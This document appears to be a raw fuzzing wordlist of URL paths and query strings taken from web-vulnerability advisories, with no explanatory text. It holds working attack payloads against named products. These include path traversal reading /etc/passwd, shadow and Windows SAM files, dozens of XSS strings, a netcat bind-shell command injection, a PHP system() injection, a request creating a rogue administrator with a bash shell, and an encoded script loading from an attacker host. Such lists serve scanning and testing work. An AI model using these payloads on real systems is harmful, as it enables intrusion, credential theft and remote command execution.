/../../../windows/win.ini 
/aaa=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
/wra/public/wralogin/?error=61&return=password/../../../../boot.ini">
/?addnewmember=new_user&pass=Password1&home=c
/user
/asp.asp%00
/asp.asp%2f
/asp.asp%5c
/asp.asp/
/asp.asp 
/somescript.html.;}}}catch(e){}},5000);void(1);
/../../../../[file] 
/svcho st.cab", "svch ost.exe", 0);
/../../winnt/repair/sam._
/../../boot.ini 
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini 
/?../../../../../../../../../../windows/win.
/apps/pbcs.dll/misc?url=../../../../../../../../../../winnt/system.ini
/apps/pbcs.dll/misc?url=../../../../../../../../../../winnt/system32/cmd.exe
//webmail.example.com/exchweb/bin/redir.asp?URL=http
//webmail.example.com/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttp%3A%2F%2Fwww.example2.com&reason=0 
/../../../windows/repair/sam 
/scripts/ISAPISkeleton.dll?<script>alert("Ooops!")</script> 
/?"><script>alert('XSS')</script>
/evil.exe';
/........../windows/win.ini
/........./autoexec.bat
/.../.../.../.../.../.../scandisk.log
/../../../../../../../../../autoexec.bat
/../../../../../../../../windows/win.ini
/.html/............/autoexec.bat
/index.php?lang=%3Cscript%3Ealert%28%22ZSL%20Testingz%22%29%3C/script%3E
/index.php?lang=%3Ciframe%20height=%220%22%20width=%220%22%20frameborder=%220%22%20src=%22http
/protected_folder/secret_file.txt%00
/?search=%25%25 
//setTimeout is used just to wait for page loading </script>
/.../.../"onmouseover="[code]" 
/mail/S030904L.LOG 
/<script>alert(document.cookie)</script> 
/ab2/Help_C/@Ab2HelpSearch?scope=HELP&DwebQuery=%3Cscript%3Ealert%28%22hello%22%
/ab2/@Ab2Admin?command=view_access
%&www.example.com/feed/
{&www.example.com/feed/
}&www.example.com/feed/
^&www.example.com/feed/
`&www.example.com/feed/
|&www.example.com/feed/ 
/"><input type="image" src="http
/secure/%2e%2e/sample/insecure.cgi?xss=<golarge>
/"><table><tr><td><a
/">Click here</td></tr></table></a>
/$1 [P]
/sample/directory;type=d 
/>/dev/null 2>/dev/null &
//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/sapbc/SAP/chopSAPLog.dsp?fullName=/etc/passwd
/courier/1000@1276123d688676a09e0100b4f54b239c/web_client_user_guide.html?lang=../../../../../etc/passwd 
/
/A>
/ourpics/sware/Mustangworld%2escr 
/portal_membership/changeMemberPortrait
/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd 
/nagiosxi/account/main.php?page=acctinfo"
/nagiosxi/admin/credentials.php?options=1
/nagiosql/index.php"
/nagiosql/admin/checkcommands.php"
/nagiosql/admin/hosts.php'
//foo%00@www.example.com/
/dns/ndcr.php?NDCR=anything;[arbritary commands]
/libs/calendrier.php?lng=../../../../../../../../../home/web/ISA/htdocs/wmi/dns/ndcr&NDCR=foo ;cat /etc/passwd > lostnoobs.txt
/xampp/ming.php?text=">><<>>"''<script>alert(document.alert)</script> 
/WmRoot/adapter-index.dsp?url=http
/../../../../etc/passwd
/stuff/bar`touch lol_hax`.jpg' 
/<script>alert("lol");</script> http
/../../../../../../../EMC/NAVISPHERE/common/log/navimon.log
/. 
/app/Default.aspx%20
/prb/www/?p=../../../../../../../etc/passwd 
/WEB-INF../
/example.mp3'; nc -e /bin/sh -l -p 1337 & ';#'" length="241734" type="audio/mpeg" /> </item> </channel> </rss>
/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd etc; put passwd ; exit; '>Put /etc/passwd</a> <a href='smb
/script.php?param=javascript
/admin/?kerberos=onmouseover=alert 
/foo/\../manager/html
/xampp/iart.php?text=">><<>>"''<script>alert(document.alert)</script>
/~nobody/etc/passwd 
/attackerSpecifiedFile"
/../../../../etc/passwd
/../
/~<username>
/../../var/run/vy_netman.cfg 
/<script>alert("Test")</script>
/librariancenter/downloads/Tips_Tricks_85x11.pdf#something=javascript
/sapbc/invoke/sap.monitor.rfcTrace/deleteSingle?fullName=<path_to_file>
/<script>alert("Test")</script>
/users/new">
spoof()">test!</a> <p> <script> function spoof() { a = window.open("http
/cgi-bin/openwebmail/userstat.pl
//foo%00@www.example.com/
/pathtowimpy/goodies/wimpy_trackplays.php?myAction=trackplays&trackFile=<?php&trackArtist=system("uname -a;id;");&trackTitle=?>
/cgi-bin/kerbynet?Section=<SECTION>&STk=<SESSION_TOKEN>&Action=<ACTION>&<PARAM>=<ADDITIONAL PARAM>
/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=About
/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../etc/passwd
/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../tmp/STk_Admin
/cgi-bin/kerbynet?STk=<GENERATED_SESSION_ID>&Action=Render&Object=sx
/cgi-bin/kerbynet?STk=<GENERATED_SESSION_ID>&Action=Render&Object=utilities_menu
/cgi-bin/kerbynet?STk=<GENERATED_SESSION_ID>&Action=Render&Object=head
/cgi-bin/kerbynet' method='post'>
/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../var/register/system/ldap/rootpw
/AAAA[about 2000 A's]AAA
/clastree.htm?POLICY=/Inbound/Filesharing/BitTorrent/Ax1500
/rpttop.htm?OP.MEAS.DATAQUERY=&MEAS.TYPE= 
/? 
/aaa(...)
/control/eventplayer?get_image_info_abspath=%3CBODY%20ONLOAD=alert(&#039;www.eazel.es&#039;)%3E
/ping?<script>alert("Running+code+within+the_context+of+"%2bdocument.domain)</script> 
/cgi/b/intfs/_intf_/ov/?ce=1&be=0&l0=3&l1=1&name=[code here]
/html/defs/
/?%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 
/dana-na/auth/rdremediate.cgi?delivery_mode=</APPLET><SCRIPT>alert(&#039;Can%20Cross%20Site%20Attack&#039;)</SCRIPT>&action=tryagain&signinId=url_default
/firewall/policy/dlg?q=-1&fzone=t<script>alert('oops')</script>>&tzone=dmz
/monitor?m[]='><script>alert(1)</script>
/manage?m[]='><script>alert(1)</script>
/events?m[]='><script>alert(1)</script>
/configuration?m[]='><script>alert(1)</script>
/alarms?m[]='><script>alert(1)</script>
/?m[]='><script>alert(1)</script>
/?action=browse&m[]="><script>alert(1)</SCRIPT>&path=/var/crash&
/cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A
/dsdn/dsweb/Services/User-XSS
/password.cgi?sysPassword=BASE64_NEW_PASSWORD 
/scvrtsrv.cmd?action=add&srvName=XSS_HERE&srvAddr=192.168.1.1&proto=1,&eStart=1,&eEnd=1,&iStart=1,&iEnd=1 
/scvrtsrv.cmd?action=add&srvName=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&srvAddr=192.168.1.1&proto=1,&eStart=1,&eEnd=1,&iStart=1,&iEnd http
/cgi-bin/webcm?getpage=../html/home/home_RelaodHref.htm&var
/vdesk/admincon/webyfiers.php?a=css&click=1&css_exceptions=%22+onfocus%3Dalert%28%26quot%3BXSS1%26quot%3B%29+foo%3D%22&save_css_exceptions=Update
/adm/file.cgi?next_file=%2fetc%2fpasswd
/adm/file.cgi?next_file=%2fetc/passwd
/adm/file.cgi?next_file=%2e.%2f%2e.%2f%2e.%2f%2e.%2fetc%2fpasswd
/adm/file.cgi?todo=pwnage&this_file=/etc/passwd 
/theme1/selector?button=status,monitor,session"><script>alert('oops')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session
/theme1/selector?button=status,monitor,session&button_url=/system/status/status"><script>alert('oops')</script>,/system/status/moniter,/system/status/session
/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter"><script>alert('oops')</script>,/system/status/session
/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session"><script>alert('oops')</script> 
/config.xml.sav
/config.xml.save 
/cgi-bin/webcm?getpage=/./././././././etc/passwd
/cgi-bin/webcm?getpage=/./././././././etc/shadow
/cgi-bin/webcm?getpage=/./././././././etc/config.xml
/login_error .shtml?uname=%3CBODY%20ONLOAD =alert(&#039;www.eazel.es&#039;)%3E 
/iframe>
/ 
/app_sta.stm
/scripter.php?act="><script>alert(1)</script>&debug=1&ifid=1&refresh-time=1&
/scripter.php?refresh-time="><script>alert(1)</script>
/scripter?act=header&ifid=')"><script>alert(1)</script>&
/?foo=aaa(...) 
/my.support.php3?c=1&s=username</title><img src=http
/cgi-bin/readfile.tcl?file=/etc/master.passwd 
/download_plugin.php3?js=&backurl=Ij48c2NyaXB0IHNyYz0iaHR0cDovL3d3dy5ldmlsLmZvby94c3MiPjwvc2NyaXB0PjxhIGhyZWY9Ig==
/download_plugin.php3?js=&backurl=Ij48dGV4dGFyZWE+SFRNTCBpbmplY3Rpb24gdGVzdDwvdGV4dGFyZWE+PGEgaHJlZj0i 
/xslt?PAGE=H04_POST&PASSWORD=admin&PASSWORD_CONF=admin 
/cgi-bin/firmwarecfg 
/changepw.html?data=........................ 
/level/15/exec/-/"><body onload=alert("bug")> http
/cgi-bin/welcome/VirtualOffice?err=ABCD%x%x%x
/cgi-bin/welcome/VirtualOffice?err=%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
/cgi-bin/welcome/VirtualOffice?err=%n 
/script%3E%3Cinput%20type=%22hidden%22%20value=%22 
/installControl.php3?1&%22%3E%3C/script%3E%3Ctextarea%3EHtml%20injection%3C/textarea%3E%3C!--= http
/dsdn/dsweb/SearchResults/XSS
/whatever.htm?FILELIST=%3C/script%3E%3Cbody+onLoad=alert(%26quot%3BXSS%26quot%3B)%3E%3Cscript%3E 
/apply.cgi?submit_button=DHCP_Static&action=--%3E%3CScRiPt%20%0A%0D%3Ealert(398343216433)%3B%3C%2FScRiPt%3E&wait_time=0&forward_single=15 
/router-info.htm
/cgi-bin/router-info.htm
/cgi-bin/NETGEAR_WNR2000.cfg 
/p/s/w/ccs.swf"
/p/s/w/ccs.swf"
/cgi/b/ic/connect/?nm=1&client=192.168.1.72&server=&event=ServerTimeout&url=<script>alert('bla');</script> 
/cgi-bin/webcm?getpage=/./././././././etc/passwd
/cgi-bin/webcm?getpage=/./././././././etc/config.xml
//192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.example.com&ADDR=127.0.0.1
/tmui/Control/form?handler=%2Ftmui%2Fsystem%2Fbigpipe%2Fbigpipe&handler_before=&form_page=%2Ftmui%2Fsystem%2Fbigpipe%2Fbigpipe.jsp%3F&form_page_before=&bigpipe_output=&bigpipe_cmd_validation=NO_VALIDATION&bigpipe_cmd_before=&bigpipe_cmd=user+testuser+password+none+testpwd+shell+%2Fbin%2Fbash+role+administrator+in+all 
/<script>alert('XSS')</script>
/control/events.tar?source_ip=%3CBODY%20ONLOAD=alert(&#039;www.eazel.es&#039;)%3E&download=egal
/vdesk/admincon/index.php?a=css&sub=sql&sql_matchscope=%22+onfocus%3Dalert%28%26quot%3BXSS2%26quot%3B%29+foo%3D%22&save_sql_matchscope=Update
/firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('oops')</script>
/fuck<script>alert(document.cookie</script> 
/my.logon.php3?%22%3E%3C/script%3E%3Cscript%3Eeval%28name%29%3C/script%3E%3C%21--" width="0%" height="0%" name="xss=document.body.appendChild(document.createElement(&#039;script&#039;));xss.setAttribute(&#039;src&#039;,&#039;http
/my.logon.php3?"></script><textarea>HTML_injection_test&lt;/textarea&gt;<!--
//admin/aindex.htm
/help/help?%3CBODY%20ONLOAD=alert(&#039;www.eazel.es&#039;)%3E
/antispam/listdel?file=blacklist&name=b<script>alert('oops')</script>&startline=0
/antispam/listdel?file=whitelist&name=a<script>alert('oops')</script>&startline=0(naturally)
/docushare/dsweb/ServicesLib/Group-#/XSS 
/cgi-mod/index.cgi?realm="><script>alert(â??XSS Possible!!!â??)</script> 
/adm/file.cgi?todo=xss&this_file=%3cscript%3ealert(1)%3c/script%3e
/adm/file.cgi?next_file=%3Cscript%3Ealert(1)%3C/script%3E
/img/main.cgi?next_file=%3Cimg%20src%3dx%20onerror%3dalert(1)%3E
/main.cgi?next_file=%3Cimg%20src%3dx%20onerror%3dalert(1)%3E
/x.php?&#039;+gems; // URL should point to data-theft script on attacker&#039;s site
/+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us HTTP/1.1 
/cgi-bin/welcome/XYZ?err=[xss] 
/cgi-bin/ldap_test.cgi?host=127.0.0.1&port=1&tl s_mode=tls_mode&tls_require=&username=&password=&filter=&searchbase=&uni que_attr=&email_attr=&domain=*&email=%3Cscript%3Ealert(document.cookie)% 3C/script%3E 
/rpFWUpload.html
/"<script>alert(1)</script>
/dana-na/auth/url_default/welcome.cgi?p=logout&c=37&u=</script><script>alert(1)</script>
/Forms/rpSysAdmin?a=%3Cscript%3Ealert(&#039;www.eazel.es&#039;)%3C/script%3E
/'
/'\n\n"
/"</script><script>' ]